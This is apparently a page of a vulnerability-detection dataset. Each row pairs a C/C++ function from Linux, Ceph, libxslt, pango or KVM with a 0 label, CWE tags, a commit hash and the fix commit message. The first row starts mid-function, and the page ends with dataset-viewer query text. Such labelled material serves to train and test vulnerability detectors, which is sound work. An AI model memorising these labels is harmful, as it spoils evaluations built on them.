int sf_size = sizeof(xfs_attr_sf_hdr_t) +
XFS_ATTR_SF_ENTSIZE_BYNAME(args.namelen, valuelen);
error = xfs_bmap_add_attrfork(dp, sf_size, rsvd);
if (error)
return error;
}
tres.tr_logres = M_RES(mp)->tr_attrsetm.tr_logres +
M_RES(mp)->tr_attrsetrt.tr_logres * args.total;
tres.tr_logcount = XFS_ATTRSET_LOG_COUNT;
tres.tr_logflags = XFS_TRANS_PERM_LOG_RES;
/*
* Root fork attributes can use reserved data blocks for this
* operation if necessary
*/
error = xfs_trans_alloc(mp, &tres, args.total, 0,
rsvd ? XFS_TRANS_RESERVE : 0, &args.trans);
if (error)
return error;
xfs_ilock(dp, XFS_ILOCK_EXCL);
error = xfs_trans_reserve_quota_nblks(args.trans, dp, args.total, 0,
rsvd ? XFS_QMOPT_RES_REGBLKS | XFS_QMOPT_FORCE_RES :
XFS_QMOPT_RES_REGBLKS);
if (error) {
xfs_iunlock(dp, XFS_ILOCK_EXCL);
xfs_trans_cancel(args.trans);
return error;
}
xfs_trans_ijoin(args.trans, dp, 0);
/*
* If the attribute list is non-existent or a shortform list,
* upgrade it to a single-leaf-block attribute list.
*/
if (dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL ||
(dp->i_d.di_aformat == XFS_DINODE_FMT_EXTENTS &&
dp->i_d.di_anextents == 0)) {
/*
* Build initial attribute list (if required).
*/
if (dp->i_d.di_aformat == XFS_DINODE_FMT_EXTENTS)
xfs_attr_shortform_create(&args);
/*
* Try to add the attr to the attribute list in
* the inode.
*/
error = xfs_attr_shortform_addname(&args);
if (error != -ENOSPC) {
/*
* Commit the shortform mods, and we're done.
* NOTE: this is also the error path (EEXIST, etc).
*/
ASSERT(args.trans != NULL);
/*
* If this is a synchronous mount, make sure that
* the transaction goes to disk before returning
* to the user.
*/
if (mp->m_flags & XFS_MOUNT_WSYNC)
xfs_trans_set_sync(args.trans);
if (!error && (flags & ATTR_KERNOTIME) == 0) {
xfs_trans_ichgtime(args.trans, dp,
XFS_ICHGTIME_CHG);
}
err2 = xfs_trans_commit(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error ? error : err2;
}
/*
* It won't fit in the shortform, transform to a leaf block.
* GROT: another possible req'mt for a double-split btree op.
*/
xfs_defer_init(args.dfops, args.firstblock);
error = xfs_attr_shortform_to_leaf(&args, &leaf_bp);
if (error)
goto out_defer_cancel;
/*
* Prevent the leaf buffer from being unlocked so that a
* concurrent AIL push cannot grab the half-baked leaf
* buffer and run into problems with the write verifier.
*/
xfs_trans_bhold(args.trans, leaf_bp);
xfs_defer_bjoin(args.dfops, leaf_bp);
xfs_defer_ijoin(args.dfops, dp);
error = xfs_defer_finish(&args.trans, args.dfops);
if (error)
goto out_defer_cancel;
/*
* Commit the leaf transformation. We'll need another (linked)
* transaction to add the new attribute to the leaf, which
* means that we have to hold & join the leaf buffer here too.
*/
error = xfs_trans_roll_inode(&args.trans, dp);
if (error)
goto out;
xfs_trans_bjoin(args.trans, leaf_bp);
leaf_bp = NULL;
}
if (xfs_bmap_one_block(dp, XFS_ATTR_FORK))
error = xfs_attr_leaf_addname(&args);
else
error = xfs_attr_node_addname(&args);
if (error)
goto out;
/*
* If this is a synchronous mount, make sure that the
* transaction goes to disk before returning to the user.
*/
if (mp->m_flags & XFS_MOUNT_WSYNC)
xfs_trans_set_sync(args.trans);
if ((flags & ATTR_KERNOTIME) == 0)
xfs_trans_ichgtime(args.trans, dp, XFS_ICHGTIME_CHG);
/*
* Commit the last in the sequence of transactions.
*/
xfs_trans_log_inode(args.trans, dp, XFS_ILOG_CORE);
error = xfs_trans_commit(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error;
out_defer_cancel:
xfs_defer_cancel(&dfops);
out:
if (leaf_bp)
xfs_trans_brelse(args.trans, leaf_bp);
if (args.trans)
xfs_trans_cancel(args.trans);
xfs_iunlock(dp, XFS_ILOCK_EXCL);
return error;
}
| 0 |
[
"CWE-241",
"CWE-754"
] |
linux
|
7b38460dc8e4eafba06c78f8e37099d3b34d473c
| 165,674,506,444,437,960,000,000,000,000,000,000,000 | 187 |
xfs: don't fail when converting shortform attr to long form during ATTR_REPLACE
Kanda Motohiro reported that expanding a tiny xattr into a large xattr
fails on XFS because we remove the tiny xattr from a shortform fork and
then try to re-add it after converting the fork to extents format having
not removed the ATTR_REPLACE flag. This fails because the attr is no
longer present, causing a fs shutdown.
This is derived from the patch in his bug report, but we really
shouldn't ignore a nonzero retval from the remove call.
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=199119
Reported-by: [email protected]
Reviewed-by: Dave Chinner <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: Darrick J. Wong <[email protected]>
|
void AES128GCM_OnWireTxHandler::reset_tx_handler(
std::initializer_list<std::uint32_t> update_size_sequence)
{
if (nonce == initial_nonce) {
if (used_initial_nonce) {
throw ceph::crypto::onwire::TxHandlerError("out of nonces");
}
used_initial_nonce = true;
}
if(1 != EVP_EncryptInit_ex(ectx.get(), nullptr, nullptr, nullptr,
reinterpret_cast<const unsigned char*>(&nonce))) {
throw std::runtime_error("EVP_EncryptInit_ex failed");
}
buffer.reserve(std::accumulate(std::begin(update_size_sequence),
std::end(update_size_sequence), AESGCM_TAG_LEN));
nonce.random_seq = nonce.random_seq + 1;
}
| 0 |
[
"CWE-323"
] |
ceph
|
dfd1d81cec62e21e21696dc87d4db5f920e51a67
| 159,294,792,468,414,920,000,000,000,000,000,000,000 | 20 |
msg/async/crypto_onwire: fix endianness of nonce_t
As a AES-GCM IV, nonce_t is implicitly shared between server and
client. Currently, if their endianness doesn't match, they are unable
to communicate in secure mode because each gets its own idea of what
the next nonce should be after the counter is incremented.
Several RFCs state that the nonce counter should be BE, but since we
use LE for everything on-disk and on-wire, make it LE.
Signed-off-by: Ilya Dryomov <[email protected]>
Reviewed-by: Radoslaw Zarzynski <[email protected]>
Reviewed-by: Sage Weil <[email protected]>
|
static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
{
struct packet_rollover *rollover = NULL;
struct packet_sock *po = pkt_sk(sk);
struct packet_fanout *f, *match;
u8 type = type_flags & 0xff;
u8 flags = type_flags >> 8;
int err;
switch (type) {
case PACKET_FANOUT_ROLLOVER:
if (type_flags & PACKET_FANOUT_FLAG_ROLLOVER)
return -EINVAL;
case PACKET_FANOUT_HASH:
case PACKET_FANOUT_LB:
case PACKET_FANOUT_CPU:
case PACKET_FANOUT_RND:
case PACKET_FANOUT_QM:
case PACKET_FANOUT_CBPF:
case PACKET_FANOUT_EBPF:
break;
default:
return -EINVAL;
}
mutex_lock(&fanout_mutex);
err = -EALREADY;
if (po->fanout)
goto out;
if (type == PACKET_FANOUT_ROLLOVER ||
(type_flags & PACKET_FANOUT_FLAG_ROLLOVER)) {
err = -ENOMEM;
rollover = kzalloc(sizeof(*rollover), GFP_KERNEL);
if (!rollover)
goto out;
atomic_long_set(&rollover->num, 0);
atomic_long_set(&rollover->num_huge, 0);
atomic_long_set(&rollover->num_failed, 0);
po->rollover = rollover;
}
if (type_flags & PACKET_FANOUT_FLAG_UNIQUEID) {
if (id != 0) {
err = -EINVAL;
goto out;
}
if (!fanout_find_new_id(sk, &id)) {
err = -ENOMEM;
goto out;
}
/* ephemeral flag for the first socket in the group: drop it */
flags &= ~(PACKET_FANOUT_FLAG_UNIQUEID >> 8);
}
match = NULL;
list_for_each_entry(f, &fanout_list, list) {
if (f->id == id &&
read_pnet(&f->net) == sock_net(sk)) {
match = f;
break;
}
}
err = -EINVAL;
if (match && match->flags != flags)
goto out;
if (!match) {
err = -ENOMEM;
match = kzalloc(sizeof(*match), GFP_KERNEL);
if (!match)
goto out;
write_pnet(&match->net, sock_net(sk));
match->id = id;
match->type = type;
match->flags = flags;
INIT_LIST_HEAD(&match->list);
spin_lock_init(&match->lock);
refcount_set(&match->sk_ref, 0);
fanout_init_data(match);
match->prot_hook.type = po->prot_hook.type;
match->prot_hook.dev = po->prot_hook.dev;
match->prot_hook.func = packet_rcv_fanout;
match->prot_hook.af_packet_priv = match;
match->prot_hook.id_match = match_fanout_group;
list_add(&match->list, &fanout_list);
}
err = -EINVAL;
spin_lock(&po->bind_lock);
if (po->running &&
match->type == type &&
match->prot_hook.type == po->prot_hook.type &&
match->prot_hook.dev == po->prot_hook.dev) {
err = -ENOSPC;
if (refcount_read(&match->sk_ref) < PACKET_FANOUT_MAX) {
__dev_remove_pack(&po->prot_hook);
po->fanout = match;
refcount_set(&match->sk_ref, refcount_read(&match->sk_ref) + 1);
__fanout_link(sk, po);
err = 0;
}
}
spin_unlock(&po->bind_lock);
if (err && !refcount_read(&match->sk_ref)) {
list_del(&match->list);
kfree(match);
}
out:
if (err && rollover) {
kfree(rollover);
po->rollover = NULL;
}
mutex_unlock(&fanout_mutex);
return err;
}
| 0 |
[
"CWE-362"
] |
linux
|
008ba2a13f2d04c947adc536d19debb8fe66f110
| 7,990,350,182,092,858,000,000,000,000,000,000,000 | 118 |
packet: hold bind lock when rebinding to fanout hook
Packet socket bind operations must hold the po->bind_lock. This keeps
po->running consistent with whether the socket is actually on a ptype
list to receive packets.
fanout_add unbinds a socket and its packet_rcv/tpacket_rcv call, then
binds the fanout object to receive through packet_rcv_fanout.
Make it hold the po->bind_lock when testing po->running and rebinding.
Else, it can race with other rebind operations, such as that in
packet_set_ring from packet_rcv to tpacket_rcv. Concurrent updates
can result in a socket being added to a fanout group twice, causing
use-after-free KASAN bug reports, among others.
Reported independently by both trinity and syzkaller.
Verified that the syzkaller reproducer passes after this patch.
Fixes: dc99f600698d ("packet: Add fanout support.")
Reported-by: nixioaming <[email protected]>
Signed-off-by: Willem de Bruijn <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
xsltCheckTopLevelElement(xsltStylesheetPtr style, xmlNodePtr inst, int err) {
xmlNodePtr parent;
if ((style == NULL) || (inst == NULL) || (inst->ns == NULL))
return(-1);
parent = inst->parent;
if (parent == NULL) {
if (err) {
xsltTransformError(NULL, style, inst,
"internal problem: element has no parent\n");
style->errors++;
}
return(0);
}
if ((parent->ns == NULL) || (parent->type != XML_ELEMENT_NODE) ||
((parent->ns != inst->ns) &&
(!xmlStrEqual(parent->ns->href, inst->ns->href))) ||
((!xmlStrEqual(parent->name, BAD_CAST "stylesheet")) &&
(!xmlStrEqual(parent->name, BAD_CAST "transform")))) {
if (err) {
xsltTransformError(NULL, style, inst,
"element %s only allowed as child of stylesheet\n",
inst->name);
style->errors++;
}
return(0);
}
return(1);
}
| 0 |
[] |
libxslt
|
7ca19df892ca22d9314e95d59ce2abdeff46b617
| 30,953,478,850,592,280,000,000,000,000,000,000,000 | 29 |
Fix for type confusion in preprocessing attributes
CVE-2015-7995 http://www.openwall.com/lists/oss-security/2015/10/27/10
We need to check that the parent node is an element before dereferencing
its namespace
|
hb_ot_layout_table_get_script_count (hb_ot_layout_t *layout,
hb_ot_layout_table_type_t table_type)
{
const GSUBGPOS &g = get_gsubgpos_table (layout, table_type);
return g.get_script_count ();
}
| 0 |
[] |
pango
|
336bb3201096bdd0494d29926dd44e8cca8bed26
| 261,130,101,278,912,050,000,000,000,000,000,000,000 | 7 |
[HB] Remove all references to the old code!
|
int kvm_read_guest_atomic(struct kvm *kvm, gpa_t gpa, void *data,
unsigned long len)
{
int r;
unsigned long addr;
gfn_t gfn = gpa >> PAGE_SHIFT;
int offset = offset_in_page(gpa);
addr = gfn_to_hva(kvm, gfn);
if (kvm_is_error_hva(addr))
return -EFAULT;
pagefault_disable();
r = __copy_from_user_inatomic(data, (void __user *)addr + offset, len);
pagefault_enable();
if (r)
return -EFAULT;
return 0;
}
| 0 |
[
"CWE-399"
] |
kvm
|
5b40572ed5f0344b9dbee486a17c589ce1abe1a3
| 335,575,670,320,034,100,000,000,000,000,000,000,000 | 18 |
KVM: Ensure all vcpus are consistent with in-kernel irqchip settings
If some vcpus are created before KVM_CREATE_IRQCHIP, then
irqchip_in_kernel() and vcpu->arch.apic will be inconsistent, leading
to potential NULL pointer dereferences.
Fix by:
- ensuring that no vcpus are installed when KVM_CREATE_IRQCHIP is called
- ensuring that a vcpu has an apic if it is installed after KVM_CREATE_IRQCHIP
This is somewhat long winded because vcpu->arch.apic is created without
kvm->lock held.
Based on earlier patch by Michael Ellerman.
Signed-off-by: Michael Ellerman <[email protected]>
Signed-off-by: Avi Kivity <[email protected]>
|
Subsets and Splits
CWE 416 & 19
The query filters records related to specific CWEs (Common Weakness Enumerations), providing a basic overview of entries with these vulnerabilities but without deeper analysis.
CWE Frequency in Train Set
Counts the occurrences of each CWE (Common Weakness Enumeration) in the dataset, providing a basic distribution but limited insight.